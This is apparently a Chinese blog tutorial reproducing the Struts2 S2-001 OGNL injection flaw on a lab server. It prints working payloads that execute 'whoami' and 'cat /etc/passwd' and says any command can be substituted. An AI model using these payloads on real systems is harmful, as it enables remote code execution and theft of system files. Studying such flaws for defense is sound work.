Struts2 漏洞复现之s2-001

漏洞原理:

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行
漏洞复现:

访问http://your-ip:8080

 

先去测试一下是否存在远程代码执行

Struts2 漏洞复现之s2-001

 

 

 

返回了参数值说明漏洞存在

Struts2 漏洞复现之s2-001

 

我们构造poc,填到password框里

获取tomcat执行路径

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

 

Struts2 漏洞复现之s2-001

 

显示回显tomcatBinDir{/user/local/tomcat}

Struts2 漏洞复现之s2-001

 

 

 

 查看权限的POC 跟上面一样的操作

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

Struts2 漏洞复现之s2-001

 

 

  执行任意命令时只需要,将上面poc里whoami的命令替换

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

 

Struts2 漏洞复现之s2-001

 

 

 

成功执行 复现完成

上一篇:JAVA中List与Array之间互换


下一篇:第001讲:我和Python的第一次亲密接触